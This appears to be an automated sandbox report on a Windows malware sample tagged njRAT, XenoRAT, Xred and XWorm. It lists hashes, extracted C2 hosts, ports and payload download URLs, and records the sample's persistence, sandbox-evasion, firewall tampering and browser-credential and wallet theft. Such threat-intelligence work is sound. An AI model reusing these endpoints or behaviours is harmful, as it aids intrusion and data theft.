njrat | 12fce52d084a8c7efa638c88fa2307bca7c038a49fe566ebb05533cacf17efbd

max time kernel
149s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20250129-en
resource tags

arch:x64arch:x86image:win10v2004-20250129-enlocale:en-usos:windows10-2004-x64system
submitted
31-01-2025 20:51

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4363463463464363463463463.exe
Size

764KB
MD5

85e3d4ac5a6ef32fb93764c090ef32b7
SHA1

adedb0aab26d15cf96f66fda8b4cfbbdcc15ef52
SHA256

4e5cc8cb98584335400d00f0a0803c3e0202761f3fbe50bcab3858a80df255e1
SHA512

a7a037bde41bcd425be18a712e27a793185f7fde638e139bbd9d253c371cd9622385eda39cf91ab715ead2591cff5b8c9f5b31d903f138d8af7bab6a9001ccab
SSDEEP

12288:6MSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9Ufbj:6nsJ39LyjbJkQFMhmC+6GD9mH

Score

10^/10

njrat xenorat xred xworm backdoor collection credential_access defense_evasion discovery execution persistence privilege_escalation rat spyware stealer themida trojan upx

Malware Config

Extracted

Family

xred

xred.mooo.com

Attributes

email
[email protected]
payload_url
http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978

https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1

http://xred.site50.net/syn/SUpdate.ini

https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download

https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1

http://xred.site50.net/syn/Synaptics.rar

https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download

https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1

http://xred.site50.net/syn/SSLLibrary.dll

Extracted

Family

xenorat

anonam39-41248.portmap.io

Mutex

Xeno_rat_nd8912d

Attributes

delay
5000
install_path
temp
port
41248
startup_name
RuntimeBroker

Extracted

Family

xworm

Version

3.0

notes-congress.gl.at.ply.gg:24370

Mutex

xfgLgucyz0P7wfhC

Attributes

install_file
USB.exe

aes.plain

Signatures

Detect XenoRat Payload 2 IoCs

resource	yara_rule
behavioral2/files/0x000300000001e7b6-231.dat	family_xenorat
behavioral2/memory/5048-238-0x0000000000DA0000-0x0000000000DB2000-memory.dmp	family_xenorat

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral2/files/0x000400000001e9ad-273.dat	family_xworm
behavioral2/memory/2680-280-0x00000000000F0000-0x000000000014A000-memory.dmp	family_xworm

Njrat family
njrat
XenorRat
XenorRat is a remote access trojan written in C#.
trojan rat xenorat
Xenorat family
xenorat
Xred
Xred is backdoor written in Delphi.
backdoor xred
Xred family
xred
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm
njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	file.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	file.exe

Blocklisted process makes network request 4 IoCs

flow	pid	Process
84	1984	powershell.exe
94	1984	powershell.exe
132	1984	powershell.exe
142	1984	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3944	powershell.exe
5880	powershell.exe
5924	powershell.exe
3736	powershell.exe
5092	powershell.exe
5236	powershell.exe
4508	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Downloads MZ/PE file 11 IoCs

flow	pid	Process
35	2780	._cache_Synaptics.exe
47	2780	._cache_Synaptics.exe
64	3380	._cache_4363463463464363463463463.exe
80	2780	._cache_Synaptics.exe
88	2780	._cache_Synaptics.exe
62	3380	._cache_4363463463464363463463463.exe
62	3380	._cache_4363463463464363463463463.exe
92	2780	._cache_Synaptics.exe
144	2780	._cache_Synaptics.exe
24	2780	._cache_Synaptics.exe
24	2780	._cache_Synaptics.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Built.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Modifies Windows Firewall 2 TTPs 1 IoCs

defense_evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
1056	netsh.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks BIOS information in registry 2 TTPs 4 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	file.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	file.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	file.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	file.exe

Checks computer location settings 2 TTPs 8 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2436272344-4274332273-444425594-1000\Control Panel\International\Geo\Nation	._cache_4363463463464363463463463.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2436272344-4274332273-444425594-1000\Control Panel\International\Geo\Nation	black.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2436272344-4274332273-444425594-1000\Control Panel\International\Geo\Nation	microsoft-onedrive.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2436272344-4274332273-444425594-1000\Control Panel\International\Geo\Nation	system.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2436272344-4274332273-444425594-1000\Control Panel\International\Geo\Nation	4363463463464363463463463.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2436272344-4274332273-444425594-1000\Control Panel\International\Geo\Nation	Synaptics.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2436272344-4274332273-444425594-1000\Control Panel\International\Geo\Nation	._cache_Synaptics.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2436272344-4274332273-444425594-1000\Control Panel\International\Geo\Nation	RuntimeBroker.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
4768	cmd.exe
5468	powershell.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\09a96e8bdcc22f9e796248ee9591454a.exe	system.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\09a96e8bdcc22f9e796248ee9591454a.exe	system.exe

Executes dropped EXE 27 IoCs

pid	Process
3380	._cache_4363463463464363463463463.exe
1516	Synaptics.exe
2780	._cache_Synaptics.exe
5048	RuntimeBroker.exe
4088	RuntimeBroker.exe
2680	XClient.exe
960	64.exe
3308	inst77player_1.0.0.1.exe
2160	inst77player.exe
512	NoEscape.exe
1260	black.exe
4152	black.exe
4100	KuwaitSetupHockey.exe
2936	KuwaitSetupHockey.tmp
1536	jet.exe
1440	xworm.exe
4352	TrainJX2.exe
4780	microsoft-onedrive.exe
1712	Built.exe
1756	Built.exe
4736	onedrive.exe
5616	rar.exe
5976	vsrumanlxdbr.exe
5712	system.exe
844	system.exe
6020	file.exe
1668	file.exe

Loads dropped DLL 33 IoCs

pid	Process
3308	inst77player_1.0.0.1.exe
3308	inst77player_1.0.0.1.exe
3308	inst77player_1.0.0.1.exe
1536	jet.exe
1536	jet.exe
1756	Built.exe
1756	Built.exe
1756	Built.exe
1756	Built.exe
1756	Built.exe
1756	Built.exe
1756	Built.exe
1756	Built.exe
1756	Built.exe
1756	Built.exe
1756	Built.exe
1756	Built.exe
1756	Built.exe
1756	Built.exe
1756	Built.exe
1756	Built.exe
1756	Built.exe
1668	file.exe
1668	file.exe
1668	file.exe
1668	file.exe
1668	file.exe
1668	file.exe
1668	file.exe
1668	file.exe
1668	file.exe
1668	file.exe
1668	file.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Themida packer 4 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral2/files/0x000c000000023bf6-1190.dat	themida
behavioral2/memory/6020-1192-0x0000000140000000-0x0000000140951000-memory.dmp	themida
behavioral2/memory/6020-1259-0x0000000140000000-0x0000000140951000-memory.dmp	themida
behavioral2/memory/1668-1261-0x0000000140000000-0x0000000140951000-memory.dmp	themida

Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver = "C:\\ProgramData\\Synaptics\\Synaptics.exe"	4363463463464363463463463.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2436272344-4274332273-444425594-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\09a96e8bdcc22f9e796248ee9591454a = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\system.exe\" .."	system.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\09a96e8bdcc22f9e796248ee9591454a = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\system.exe\" .."	system.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 2 IoCs

defense_evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	file.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	file.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
22	raw.githubusercontent.com
24	raw.githubusercontent.com
62	raw.githubusercontent.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
106	ip-api.com
127	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\MRT.exe	vsrumanlxdbr.exe
File opened for modification	C:\Windows\system32\MRT.exe	onedrive.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
1068	tasklist.exe
5476	tasklist.exe
5400	tasklist.exe
4852	tasklist.exe
2420	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
840	cmd.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs

pid	Process
4152	black.exe
6020	file.exe
1668	file.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 1440 set thread context of 5048	1440	xworm.exe	118
PID 5976 set thread context of 5152	5976	vsrumanlxdbr.exe	272
PID 5976 set thread context of 2500	5976	vsrumanlxdbr.exe	274

UPX packed file 45 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0008000000023c4a-724.dat	upx
behavioral2/memory/1756-738-0x00007FFBB5F40000-0x00007FFBB6528000-memory.dmp	upx
behavioral2/files/0x0008000000023c3e-748.dat	upx
behavioral2/files/0x0016000000023c34-747.dat	upx
behavioral2/files/0x0008000000023c3a-745.dat	upx
behavioral2/files/0x0008000000023c00-743.dat	upx
behavioral2/memory/1756-750-0x00007FFBD8EF0000-0x00007FFBD8EFF000-memory.dmp	upx
behavioral2/memory/1756-749-0x00007FFBD85F0000-0x00007FFBD8614000-memory.dmp	upx
behavioral2/memory/1756-757-0x00007FFBD39A0000-0x00007FFBD39C3000-memory.dmp	upx
behavioral2/memory/1756-758-0x00007FFBB5DC0000-0x00007FFBB5F33000-memory.dmp	upx
behavioral2/memory/1756-760-0x00007FFBD8EE0000-0x00007FFBD8EED000-memory.dmp	upx
behavioral2/memory/1756-759-0x00007FFBD3980000-0x00007FFBD3999000-memory.dmp	upx
behavioral2/memory/1756-761-0x00007FFBD3950000-0x00007FFBD397E000-memory.dmp	upx
behavioral2/memory/1756-762-0x00007FFBD3890000-0x00007FFBD3948000-memory.dmp	upx
behavioral2/memory/1756-763-0x00007FFBB5F40000-0x00007FFBB6528000-memory.dmp	upx
behavioral2/memory/1756-770-0x00007FFBB5310000-0x00007FFBB542C000-memory.dmp	upx
behavioral2/memory/1756-769-0x00007FFBD8760000-0x00007FFBD876D000-memory.dmp	upx
behavioral2/memory/1756-768-0x00007FFBD39A0000-0x00007FFBD39C3000-memory.dmp	upx
behavioral2/memory/1756-767-0x00007FFBD3650000-0x00007FFBD3664000-memory.dmp	upx
behavioral2/memory/1756-766-0x00007FFBD85F0000-0x00007FFBD8614000-memory.dmp	upx
behavioral2/memory/1756-764-0x00007FFBB4940000-0x00007FFBB4CB5000-memory.dmp	upx
behavioral2/memory/1756-756-0x00007FFBD8B80000-0x00007FFBD8B99000-memory.dmp	upx
behavioral2/memory/1756-755-0x00007FFBD3E40000-0x00007FFBD3E6D000-memory.dmp	upx
behavioral2/memory/1756-826-0x00007FFBD3980000-0x00007FFBD3999000-memory.dmp	upx
behavioral2/memory/1756-924-0x00007FFBD3950000-0x00007FFBD397E000-memory.dmp	upx
behavioral2/memory/1756-971-0x00007FFBD3890000-0x00007FFBD3948000-memory.dmp	upx
behavioral2/memory/1756-1002-0x00007FFBB4940000-0x00007FFBB4CB5000-memory.dmp	upx
behavioral2/memory/1756-1017-0x00007FFBB5F40000-0x00007FFBB6528000-memory.dmp	upx
behavioral2/memory/1756-1023-0x00007FFBB5DC0000-0x00007FFBB5F33000-memory.dmp	upx
behavioral2/memory/1756-1018-0x00007FFBD85F0000-0x00007FFBD8614000-memory.dmp	upx
behavioral2/memory/1756-1114-0x00007FFBD8760000-0x00007FFBD876D000-memory.dmp	upx
behavioral2/memory/1756-1113-0x00007FFBD3650000-0x00007FFBD3664000-memory.dmp	upx
behavioral2/memory/1756-1112-0x00007FFBB4940000-0x00007FFBB4CB5000-memory.dmp	upx
behavioral2/memory/1756-1111-0x00007FFBD3890000-0x00007FFBD3948000-memory.dmp	upx
behavioral2/memory/1756-1110-0x00007FFBD3950000-0x00007FFBD397E000-memory.dmp	upx
behavioral2/memory/1756-1109-0x00007FFBD8EE0000-0x00007FFBD8EED000-memory.dmp	upx
behavioral2/memory/1756-1108-0x00007FFBD3980000-0x00007FFBD3999000-memory.dmp	upx
behavioral2/memory/1756-1107-0x00007FFBB5DC0000-0x00007FFBB5F33000-memory.dmp	upx
behavioral2/memory/1756-1106-0x00007FFBD39A0000-0x00007FFBD39C3000-memory.dmp	upx
behavioral2/memory/1756-1105-0x00007FFBD8B80000-0x00007FFBD8B99000-memory.dmp	upx
behavioral2/memory/1756-1104-0x00007FFBD3E40000-0x00007FFBD3E6D000-memory.dmp	upx
behavioral2/memory/1756-1103-0x00007FFBD8EF0000-0x00007FFBD8EFF000-memory.dmp	upx
behavioral2/memory/1756-1115-0x00007FFBB5310000-0x00007FFBB542C000-memory.dmp	upx
behavioral2/memory/1756-1102-0x00007FFBD85F0000-0x00007FFBD8614000-memory.dmp	upx
behavioral2/memory/1756-1101-0x00007FFBB5F40000-0x00007FFBB6528000-memory.dmp	upx

Drops file in Program Files directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\òÐòÐÎåÏßÆ×²¥·ÅÆ÷\install.log	inst77player_1.0.0.1.exe
File created	C:\Program Files (x86)\òÐòÐÎåÏßÆ×²¥·ÅÆ÷\inst77player.exe	inst77player_1.0.0.1.exe
File created	C:\Program Files (x86)\òÐòÐÎåÏßÆ×²¥·ÅÆ÷\ËµÃ÷.txt	inst77player_1.0.0.1.exe
File created	C:\Program Files (x86)\òÐòÐÎåÏßÆ×²¥·ÅÆ÷\uninst.exe	inst77player_1.0.0.1.exe

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4900	sc.exe
5880	sc.exe
4812	sc.exe
6072	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

Program crash 1 IoCs

pid	pid_target	Process	procid_target
2260	1440	WerFault.exe	117

System Location Discovery: System Language Discovery 1 TTPs 24 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	._cache_Synaptics.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AppLaunch.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TrainJX2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	._cache_4363463463464363463463463.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RuntimeBroker.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	jet.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xworm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	inst77player.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	black.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	KuwaitSetupHockey.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	KuwaitSetupHockey.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	microsoft-onedrive.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4363463463464363463463463.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Synaptics.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RuntimeBroker.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	inst77player_1.0.0.1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NoEscape.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	system.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	system.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
5664	cmd.exe
5708	PING.EXE

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
4884	cmd.exe
5664	netsh.exe

NSIS installer 2 IoCs

installer

resource	yara_rule
behavioral2/files/0x000a000000023b75-300.dat	nsis_installer_1
behavioral2/files/0x000a000000023b75-300.dat	nsis_installer_2

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2320	WMIC.exe
4184	WMIC.exe
636	WMIC.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
5504	systeminfo.exe

Modifies data under HKEY_USERS 46 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	4363463463464363463463463.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	Synaptics.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
5708	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
4184	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1704	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
960	64.exe
960	64.exe
4088	RuntimeBroker.exe
4088	RuntimeBroker.exe
